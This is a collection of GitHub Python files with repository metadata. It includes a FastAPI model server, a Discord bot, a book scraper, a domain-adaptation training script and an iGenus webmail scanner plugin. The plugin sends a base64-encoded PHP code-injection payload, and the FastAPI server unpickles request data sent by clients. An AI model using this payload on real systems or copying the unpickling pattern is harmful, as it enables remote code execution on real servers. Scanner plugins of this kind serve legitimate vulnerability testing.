estimativas.append(novas_estimativas)
return tuple(estimativas[-1])
|
IDK04/Projeto-fp-1
|
main.py
|
main.py
|
py
| 11,418 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
16734122984
|
from typing import Any
from fastapi import FastAPI, Response, Request
from pathlib import Path
from pydantic import BaseModel
from autogoal.utils._storage import inspect_storage
import uvicorn
from autogoal_remote.distributed.proxy import loads, dumps, encode, decode
class Body(BaseModel):
values: Any
app = FastAPI()
@app.get("/input")
async def input(request: Request):
"""
Returns the model input type
"""
return {
"semantic type name": str(request.app.model.best_pipeline_.input_types),
"pickled data": dumps(
request.app.model.best_pipeline_.input_types, use_dill=True
),
}
@app.get("/output")
async def output(request: Request):
"""
Returns the model output type
"""
return {
"semantic type name": str(
request.app.model.best_pipeline_.algorithms[-1].__class__.output_type()
),
"pickled data": dumps(
request.app.model.best_pipeline_.algorithms[-1].__class__.output_type(),
use_dill=True,
),
}
@app.get("/inspect")
async def inspect(request: Request):
"""
Returns the model inspect command
"""
return {"data": str(inspect_storage(Path(request.app.model.export_path)))}
@app.post("/")
async def eval(t: Body, request: Request):
"""
Returns the model prediction over the provided values
"""
model = request.app.model
data = loads(t.values)
result = model.predict(data)
return {"data": dumps(result)}
def run(model, ip=None, port=None):
"""
Starts HTTP API with specified model.
"""
app.model = model
uvicorn.run(app, host=ip or "0.0.0.0", port=port or 8000)
|
autogoal/autogoal-remote
|
autogoal_remote/production/server.py
|
server.py
|
py
| 1,689 |
python
|
en
|
code
| 1 |
github-code
|
6
|
27516277876
|
from discord.ext import commands
from databases.database_manager import db
class Hive(commands.Cog):
def __init__(self, bot):
self.bot = bot
self._last_member = None
@commands.command(name='get_map_id', help='<map_name>',
aliases=["get_id","gmi"])
async def get_map_id(self, ctx, map_name):
map_name = map_name.title()
map_id = db.translate(map_name)
if map_id is None:
await ctx.send("Sorry, I could not find `{}` in the database 🙁".format(map_name))
return
else:
await ctx.send("The id for the `{}` map is `{}`".format(map_name, map_id))
def setup(bot):
bot.add_cog(Hive(bot))
|
tintin10q/hive-discord-bot
|
commands/get_map_id.py
|
get_map_id.py
|
py
| 710 |
python
|
en
|
code
| 0 |
github-code
|
6
|
16733135761
|
import argparse
import logging
import os
import sys
import time
from urllib.parse import urljoin, urlparse, unquote, parse_qs
import requests
import urllib3
from bs4 import BeautifulSoup
from pathvalidate import sanitize_filename
logger = logging.getLogger(__name__)
class BookError(Exception):
def __init__(self, text):
self.txt = text
def main():
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
library_url = 'https://tululu.org'
books_path = 'books/'
os.makedirs(books_path, exist_ok=True)
books_images_path = 'images/'
os.makedirs(books_images_path, exist_ok=True)
parser = argparse.ArgumentParser(description='парсер онлайн-библиотеки https://tululu.org/')
parser.add_argument('start_id', nargs='?', default='1', type=int, help='с какой страницы начинать')
parser.add_argument('end_id', nargs='?', default='1000', type=int, help='по какую страницу качать')
args = parser.parse_args()
urllib3.disable_warnings()
for book_number in range(args.start_id, args.end_id + 1):
book_url = f'{library_url}/b{book_number}/'
try:
logger.info(f'ищем книгу по адресу {book_url}')
response = requests.get(book_url, verify=False)
response.raise_for_status()
check_for_redirect(response)
book = parse_book_page(response.text, book_url)
download_txt(f'{library_url}/txt.php?id={book_number}', book_number, book['title'], books_path)
download_image(book['image_url'], books_images_path)
except requests.HTTPError as e:
print(e, file=sys.stderr)
logger.exception(e)
except requests.ConnectionError as e:
logger.exception(e)
print(e, file=sys.stderr)
time.sleep(10)
except requests.TooManyRedirects:
print('обнаружен редирект', file=sys.stderr)
except KeyboardInterrupt:
print('Скачивание остановлено')
sys.exit()
except BookError as e:
logger.exception(e)
print(e, file=sys.stderr)
def check_for_redirect(response):
if len(response.history) > 0:
logger.info('Такой страницы не существует.')
raise requests.TooManyRedirects
def parse_book_page(content, book_url):
soup = BeautifulSoup(content, 'lxml')
title_author_string = soup.select_one('.ow_px_td h1').text
book_title, book_author = map(lambda title: title.strip(), title_author_string.split('::'))
book_image_src = soup.select_one('.bookimage img')['src']
book_image_url = urljoin(book_url, book_image_src)
search_text_result = soup.select_one('table.d_book a[title$=txt]')
if not search_text_result:
raise BookError('Текст этой книги отсутствует')
book_text_url = search_text_result['href']
parsed_book_query = parse_qs(urlparse(book_text_url).query)
book_id = parsed_book_query['id'][0]
comment_tags = soup.select('.texts .black')
book_comments = [comment_tag.text for comment_tag in comment_tags]
genre_tags = soup.select('span.d_book a')
book_genres = [genre_tag.text for genre_tag in genre_tags]
book = {
'title': book_title,
'author': book_author,
'comments': book_comments,
'genres': book_genres,
'image_url': book_image_url,
'id': book_id,
'text_url': urljoin(book_url, book_text_url)
}
return book
def download_txt(url, book_id, filename, folder='books/'):
"""Функция для скачивания текстовых файлов.
Args:
url (str): Cсылка на текст, который хочется скачать.
book_id (int): Уникальный id книги
filename (str): Имя файла, с которым сохранять.
folder (str): Папка, куда сохранять.
Returns:
str: Путь до файла, куда сохранён текст.
"""
file_path = os.path.join(folder, f'{book_id}. {sanitize_filename(filename)}.txt')
response = requests.get(url, verify=False)
response.raise_for_status()
check_for_redirect(response)
with open(file_path, 'wb') as file:
file.write(response.content)
logger.info(f'скачали книгу: {file_path}')
return file_path
def download_image(url, folder='images/', rewrite=False):
response = requests.get(url, verify=False)
response.raise_for_status()
check_for_redirect(response)
file_path = os.path.join(folder, os.path.basename(unquote(urlparse(url).path)))
if not rewrite and os.path.exists(file_path):
return file_path
with open(file_path, 'wb') as file:
file.write(response.content)
logger.info(f'скачали файл: {file_path}')
return file_path
if __name__ == '__main__':
main()
|
petrovskydv/parse_library
|
parse_tululu.py
|
parse_tululu.py
|
py
| 5,093 |
python
|
en
|
code
| 0 |
github-code
|
6
|
15521199342
|
state = []
with open('D6_input.txt', 'r') as fopen:
state = list(map(int, fopen.readline().rstrip().split(',')))
for i in range(256):
for ind, fish_state in enumerate(state):
if fish_state == 0:
state[ind] = 6
state.append(9)
else:
state[ind] -= 1
print(len(state))
|
probablyanasian/advent-of-code
|
2021/D6/Day_6A.py
|
Day_6A.py
|
py
| 284 |
python
|
en
|
code
| 0 |
github-code
|
6
|
73787200189
|
import DaNN
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
from tqdm import tqdm
import argparse
import data_loader
import mmd
import scipy.io
import json
DEVICE = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
LEARNING_RATE = 0.02
MOMEMTUN = 0.05
L2_WEIGHT = 0.003
DROPOUT = 0.5
N_EPOCH = 200
BATCH_SIZE = [64, 64]
LAMBDA = 0.5
GAMMA = 10 ^ 3
RESULT_TRAIN = []
RESULT_TEST = []
log_train = open('log_train_a-w.txt', 'w')
log_test = open('log_test_a-w.txt', 'w')
parser = argparse.ArgumentParser()
parser.add_argument("--seed", type = int, default=0)
parser.add_argument("--person", type=int, default=1)
args = parser.parse_args()
def mmd_loss(x_src, x_tar):
return mmd.mix_rbf_mmd2(x_src, x_tar, [GAMMA])
def train(model, optimizer, epoch, data_src, data_tar):
total_loss_train = 0
criterion = nn.CrossEntropyLoss()
correct = 0
batch_j = 0
list_src, list_tar = list(enumerate(data_src)), list(enumerate(data_tar))
for batch_id, (data, target) in enumerate(data_src):
_, (x_tar, y_target) = list_tar[batch_j]
data, target = data.to(DEVICE), target.to(DEVICE)
x_tar, y_target = x_tar.to(DEVICE), y_target.to(DEVICE)
model.train()
y_src, x_src_mmd, x_tar_mmd = model(data, x_tar)
loss_c = criterion(y_src, target)
loss_mmd = mmd_loss(x_src_mmd, x_tar_mmd)
pred = y_src.data.max(1)[1] # get the index of the max log-probability
correct += pred.eq(target.data.view_as(pred)).cpu().sum()
loss = loss_c + LAMBDA * loss_mmd
optimizer.zero_grad()
loss.backward()
optimizer.step()
total_loss_train += loss.data
res_i = 'Epoch: [{}/{}], Batch: [{}/{}], loss: {:.6f}'.format(
epoch, N_EPOCH, batch_id + 1, len(data_src), loss.data
)
batch_j += 1
if batch_j >= len(list_tar):
batch_j = 0
total_loss_train /= len(data_src)
acc = correct * 100. / len(data_src.dataset)
res_e = 'Epoch: [{}/{}], training loss: {:.6f}, correct: [{}/{}], training accuracy: {:.4f}%'.format(
epoch, N_EPOCH, total_loss_train, correct, len(data_src.dataset), acc
)
tqdm.write(res_e)
log_train.write(res_e + '\n')
RESULT_TRAIN.append([epoch, total_loss_train, acc])
return model
def test(model, data_tar, e):
total_loss_test = 0
correct = 0
criterion = nn.CrossEntropyLoss()
with torch.no_grad():
for batch_id, (data, target) in enumerate(data_tar):
data, target = data.to(DEVICE),target.to(DEVICE)
model.eval()
ypred, _, _ = model(data, data)
loss = criterion(ypred, target)
pred = ypred.data.max(1)[1] # get the index of the max log-probability
correct += pred.eq(target.data.view_as(pred)).cpu().sum()
total_loss_test += loss.data
accuracy = correct * 100. / len(data_tar.dataset)
res = 'Test: total loss: {:.6f}, correct: [{}/{}], testing accuracy: {:.4f}%'.format(
total_loss_test, correct, len(data_tar.dataset), accuracy
)
tqdm.write(res)
RESULT_TEST.append([e, total_loss_test, accuracy])
log_test.write(res + '\n')
return accuracy / 100.
def dataset_load(batch_size = 64, person = args.person):
X_source = np.array([])
y_source = np.array([])
for i in range(10):
data = scipy.io.loadmat('../train/%d.mat'%(i+1))['de_feature']
label = scipy.io.loadmat('../train/%d.mat'%(i+1))['label']
if i == 0:
X_source = data
y_source = label
else:
X_source = np.vstack((X_source, data))
y_source = np.vstack((y_source, label))
X_source = (X_source - np.min(X_source, axis=0)) / (np.max(X_source, axis=0) - np.min(X_source, axis=0))
X_source = torch.from_numpy(X_source).float()
y_source = torch.from_numpy(y_source).long().squeeze()
source_dataset = torch.utils.data.TensorDataset(X_source, y_source)
X_target = scipy.io.loadmat('../test/%d.mat'%(10 + person))['de_feature']
y_target = scipy.io.loadmat('../test/%d.mat'%(10 + person))['label']
X_target = (X_target - np.min(X_target, axis=0)) / (np.max(X_target, axis=0) - np.min(X_target, axis=0))
X_target = torch.from_numpy(X_target).float()
y_target = torch.from_numpy(y_target).long().squeeze()
target_dataset = torch.utils.data.TensorDataset(X_target, y_target)
return source_dataset, target_dataset
if __name__ == '__main__':
torch.manual_seed(args.seed)
source_dataset, target_dataset = dataset_load(person=args.person)
data_src = torch.utils.data.DataLoader(dataset=source_dataset,batch_size=64,shuffle=True,num_workers=1, drop_last = True)
data_tar = torch.utils.data.DataLoader(dataset=target_dataset,batch_size=64,shuffle=True,num_workers=1, drop_last = True)
model = DaNN.DaNN(n_input=310, n_hidden=512, n_class=4)
model = model.to(DEVICE)
optimizer = optim.SGD(
model.parameters(),
lr=LEARNING_RATE,
momentum=MOMEMTUN,
weight_decay=L2_WEIGHT
)
acc_list = []
for e in tqdm(range(1, N_EPOCH + 1)):
model = train(model=model, optimizer=optimizer,
epoch=e, data_src=data_src, data_tar=data_tar)
acc = test(model, data_tar, e)
acc_list.append(acc.item())
jd = {"test_acc": acc_list}
with open(str(args.seed)+'/acc'+str(args.person)+'.json', 'w') as f:
json.dump(jd, f)
torch.save(model, 'model_dann.pkl')
log_train.close()
log_test.close()
res_train = np.asarray(RESULT_TRAIN)
res_test = np.asarray(RESULT_TEST)
np.savetxt('res_train_a-w.csv', res_train, fmt='%.6f', delimiter=',')
np.savetxt('res_test_a-w.csv', res_test, fmt='%.6f', delimiter=',')
|
comprehensiveMap/EI328-project
|
DaNN_/main.py
|
main.py
|
py
| 5,846 |
python
|
en
|
code
| 5 |
github-code
|
6
|
37429210278
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: iGenus邮件系统一处无需登录的任意代码执行
referer: http://www.wooyun.org/bugs/wooyun-2015-0156126
author: Lucifer
description: /home/webmail/igenus/include/login_inc.php base64编码未验证可写入shell
'''
import sys
import requests
class igenus_code_exec_BaseVerify:
def __init__(self, url):
self.url = url
def run(self):
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
payload = "/index.php?selTpl=YWF8YWFhJzsKcGhwaW5mbygpOyM="
vulnurl = self.url + payload
try:
req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
if r"Configuration File (php.ini) Path" in req.text:
return "[+]存在igenus命令执行漏洞...(高危)\tpayload: "+vulnurl
except:
return "[-]connect timeout"
if __name__ == "__main__":
testVuln = igenus_code_exec_BaseVerify(sys.argv[1])
testVuln.run()
|
iceyhexman/onlinetools
|
scanner/plugins/cms/iGenus/igenus_code_exec.py
|
igenus_code_exec.py
|
py
| 1,113 |
python
|
en
|
code
| 1,626 |
github-code
|
6
|
25693151845
|
# coding=gbk
# 9.12 导入类练习 多个模块
"""在admin privileges类中导入用户模块中的user类"""
from user import User
class Privileges():
"""创建一个有关管理员权限的小类"""
def __init__(
self,
privileges= ['can add post','can delete post','can ban user']):
"""初始化权限的属性"""
self.privileges = privileges
def show_privileges(self):
"""方法 描述有关管理员权限的职能"""
print("\nThe admin user have these privileges:")
for n in self.privileges:
print("\t",n)
class Admin(User):
"""创建用户类的子类 管理员类"""
def __init__(self,first_name, last_name, gender,age):
"""接受并初始化父类的属性"""
super().__init__(first_name, last_name, gender, age)
self.privileges = Privileges()
user_1 = Admin('lei', 'tianfu', 'male', 21)
user_1.privileges.show_privileges()
user_1.describe_user()
|
Troysps/learn_python
|
77/9.12导入类练习.py
|
9.12导入类练习.py
|
py
| 947 |
python
|
en
|
code
| 0 |
github-code
|
6
|
15028429007
|
n1 = int(input('Digite o primeiro número inteiro: '))
n2 = int(input('Digite o segundo número inteiro: '))
n3 = int(input('Digite o terceiro número inteiro: '))
if n1 > n2 and n3:
print(f'O maior número é {n1}')
input('Pressione ENTER para encerrar programa')
if n2 > n1 and n3:
print(f'O maior número é {n2}')
input('Pressione ENTER para encerrar programa')
exit()
if n3 > n1 and n2:
print(f'O maior número é {n3}')
input('Pressione ENTER para encerrar programa')
exit()
|
LeonardoDaSilvaBrandao/Phyton-Exercicios
|
Faça um Programa que leia três números e mostre o maior deles..py
|
Faça um Programa que leia três números e mostre o maior deles..py
|
py
| 535 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
26660179991
|
'''Model base module'''
import config
import redis
import collections
import asyncio
import sqlalchemy as sa
from sqlalchemy import MetaData
class Relation(object):
def __init__(self, target_cls, back_populates=None, onupdate="CASCADE",
ondelete="CASCADE", rkey=None, reverse=False):
self.target_cls = target_cls
self.back_populates = back_populates
self.onupdate = onupdate
self.ondelete = ondelete
self.rkey = rkey
self.reverse = reverse
def bind(self, key, source_cls):
target_cls = self.target_cls
pkey = target_cls._symbols[target_cls._pname].obj
self.rkey = sa.Column('_rel_{}'.format(key), pkey.type,
sa.ForeignKey(pkey, onupdate=self.onupdate, ondelete=self.ondelete),
index=True)
if self.back_populates is not None:
assert self.back_populates not in self.target_cls._relations
self.target_cls._relations[self.back_populates] = Relation(
source_cls, rkey=self.rkey, reverse=True)
return self.rkey
class Symbol(object):
def __init__(self, obj, immutable, primary):
self.obj = obj
self.immutable = immutable
self.primary = primary
class ShadowColumn(object):
def __init__(self, cls, mapping, prefix):
self.cls = cls
self.mapping = mapping
self.prefix = prefix
def __getattr__(self, name):
column = getattr(self.cls, name)
if isinstance(column, sa.Column):
name = self.prefix + column.name
if name in self.mapping:
return self.mapping[name]
elif isinstance(column, ShadowColumn):
return ShadowColumn(column.cls, self.mapping,
'{}__{}_'.format(self.prefix, name))
raise AttributeError
class ShadowMeta(type):
def build_relation_query(table, relations):
query = table
label_map = {}
for key, relation in relations.items():
prefix = '__' + key
target_cls = relation.target_cls
target_query = target_cls._relquery.alias(prefix)
for column in target_query.columns:
label_map[column] = '{}_{}'.format(prefix, column.name)
query = query.join(target_query,
relation.rkey == target_query.columns[target_cls._pname])
relation_columns = {}
select_columns = []
for column in query.columns:
if column.name.startswith('_rel_'):
continue
if column in label_map:
labeled_column = column.label(label_map[column])
relation_columns[labeled_column.name] = column
column = labeled_column
select_columns.append(column)
return (relation_columns, sa.select(select_columns, from_obj=query))
def __new__(cls, name, bases, namespace):
model_cls = type.__new__(cls, name, bases, namespace)
if name == 'BaseModel':
return model_cls
pname = None
symbols = {}
columns = {}
relations = {}
pkey_constraint = None
attrs = list(model_cls.__dict__.items())
for key, value in attrs:
if key == '__primarykey__':
pkey_constraint = sa.PrimaryKeyConstraint(
*[column.name for column in value])
continue
if (not isinstance(value, Relation) and
not isinstance(value, sa.Column)):
continue
immutable = False
primary = False
name = key
if key.startswith('_'):
name = name.lstrip('_')
immutable = True
if isinstance(value, Relation):
relations[name] = value
elif isinstance(value, sa.Column):
columns[name] = value
primary = value.primary_key
if primary:
assert pname is None
pname = name
symbols[name] = Symbol(value, immutable, primary)
delattr(model_cls, key)
model_cls._pname = pname
table_columns = list(columns.values())
for key, relation in relations.items():
table_columns.append(relation.bind(key, model_cls))
if pkey_constraint is not None:
table_columns.append(pkey_constraint)
model_cls._columns = columns
model_cls._relations = relations
model_cls._symbols = symbols
model_cls._table = sa.Table(namespace['__tablename__'],
model_cls._metadata, *table_columns)
model_cls._relcolumns, model_cls._relquery = cls.build_relation_query(
model_cls._table, relations)
return model_cls
def __getattr__(self, name):
if name not in self._symbols:
raise AttributeError
symbol = self._symbols[name]
if isinstance(symbol.obj, sa.Column):
return symbol.obj
elif isinstance(symbol.obj, Relation):
relation = symbol.obj
if not relation.reverse:
return ShadowColumn(relation.target_cls, self._relcolumns,
'__{}_'.format(name))
raise AttributeError
class ShadowExpr(object):
def __init__(self, expr, typ=None):
self.expr = expr
self.typ = typ
def __getattr__(self, name):
func = getattr(self.expr, name)
def wrapper(*args, **kwargs):
'''Wrapper.'''
proxy_args = []
for value in args:
proxy_args.append(self.proxy_value(value))
proxy_kwargs = {}
for key, value in kwargs.items():
proxy_kwargs[key] = self.proxy_value(value)
return ShadowExpr(func(*proxy_args, **proxy_kwargs), typ=self.typ)
return wrapper
def proxy_value(self, value):
if isinstance(value, ShadowExpr):
return value.expr
elif isinstance(value, ShadowMeta):
return value._table
return value
async def execute(self, conn):
results = await conn.execute(self.expr)
return ShadowResult(results, self.typ)
class ShadowResult(object):
def __init__(self, results, typ):
self.results = results
self.rowcount = self.results.rowcount
self.typ = typ
def __aiter__(self):
return self
async def __anext__(self):
result = await self.results.fetchone()
if result is None:
raise StopAsyncIteration
if self.typ is None:
return result
else:
return self.typ(result)
async def first(self):
result = await self.results.fetchone()
self.results.close()
if result is None:
return None
elif self.typ is None:
return result
else:
return self.typ(result)
async def scalar(self):
result = await self.results.scalar()
if result is None:
return None
elif self.typ is None:
return result
else:
return self.typ(result)
class BaseModel(object, metaclass=ShadowMeta):
_metadata = MetaData()
def __init__(self, _result_obj=None, _prefix='', **kwargs):
if _result_obj is not None:
fields = dict((key, _result_obj[_prefix + column.name])
for key, column in self._columns.items())
for key, relation in self._relations.items():
if not relation.reverse:
target_cls = relation.target_cls
next_prefix = '{}__{}_'.format(_prefix, key)
fields[key] = target_cls(_result_obj, next_prefix)
else:
fields = {}
for key, column in self._columns.items():
value = None
if key in kwargs:
value = kwargs[key]
elif key != self._pname:
raise AttributeError
fields[key] = value
for key, relation in self._relations.items():
if not relation.reverse and key in kwargs:
fields[key] = kwargs[key]
object.__setattr__(self, '_fields', fields)
if self._pname is not None:
self.update_reverse_relations()
def __getattr__(self, name):
return self._fields[name]
def __setattr__(self, name, value):
override_mutable = False
if name.startswith('_'):
name = name.lstrip('_')
override_mutable = True
symbol = self._symbols.get(name)
if symbol is None:
raise AttributeError
if symbol.primary:
raise AttributeError
if symbol.immutable and not override_mutable:
raise AttributeError
if isinstance(symbol.obj, Relation):
relation = symbol.obj
if relation.reverse:
raise AttributeError
self._fields[name] = value
def update_reverse_relations(self):
pval = self._fields[self._pname]
reverse_relations = [(key, relation) for key, relation
in self._relations.items() if relation.reverse]
if pval is None:
for key, relation in reverse_relations:
if key in self._fields:
del self._fields[key]
else:
for key, relation in reverse_relations:
self._fields[key] = (relation.target_cls.select()
.where(relation.rkey == pval))
async def save(self, conn):
table_fields = {}
for key, column in self._columns.items():
if key not in self._fields:
raise AttributeError
if key == self._pname and self._fields[key] is None:
continue
table_fields[column.name] = self._fields[key]
for key, relation in self._relations.items():
if relation.reverse:
continue
if key not in self._fields:
raise AttributeError
target = self._fields[key]
target_pval = getattr(target, target._pname)
assert target_pval is not None
table_fields[relation.rkey.name] = target_pval
expr = (sa.dialects.postgresql.insert(self._table)
.values(**table_fields)
.on_conflict_do_update(
constraint=self._table.primary_key,
set_=table_fields
))
if self._pname is not None:
pkey = self._symbols[self._pname].obj
expr = expr.returning(pkey)
result = await conn.execute(expr)
if self._pname is not None:
pval = await result.scalar()
assert pval is not None
self._fields[self._pname] = pval
# Since we may change the primary value, update reversed relation
# queries.
self.update_reverse_relations()
@classmethod
def select(cls):
return ShadowExpr(cls._relquery, typ=cls)
@classmethod
def delete(cls):
return ShadowExpr(cls._table.delete())
@classmethod
def join(cls, other, *args, **kwargs):
return ShadowExpr(cls._table.join(other._table, *args, **kwargs))
def select(fields, cls=None):
query_fields = []
for field in fields:
if isinstance(field, BaseModel):
field = field._table
query_fields.append(field)
return ShadowExpr(sa.select(query_fields), typ=cls)
def model_context(func):
class Context:
def __init__(self, conn, redis):
self.conn = conn
self.redis = redis
async def wrapper(*args, **kwargs):
'''Wrapper.'''
task = asyncio.Task.current_task()
ctx = Context(task._conn, task._redis)
return await func(*args, **kwargs, ctx=ctx)
return wrapper
def create_schemas(db_url):
# Make sure to load all schemas.
import model.user
import model.scoring
import model.problem
import model.proset
import model.challenge
engine = sa.create_engine(db_url)
BaseModel._metadata.create_all(engine)
engine.dispose()
def drop_schemas(db_url):
# Make sure to load all schemas.
import model.user
import model.scoring
import model.problem
import model.proset
import model.challenge
engine = sa.create_engine(db_url)
BaseModel._metadata.drop_all(engine)
engine.dispose()
|
SproutProject/sptoj-server
|
model/__init__.py
|
__init__.py
|
py
| 12,647 |
python
|
en
|
code
| 0 |
github-code
|
6
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.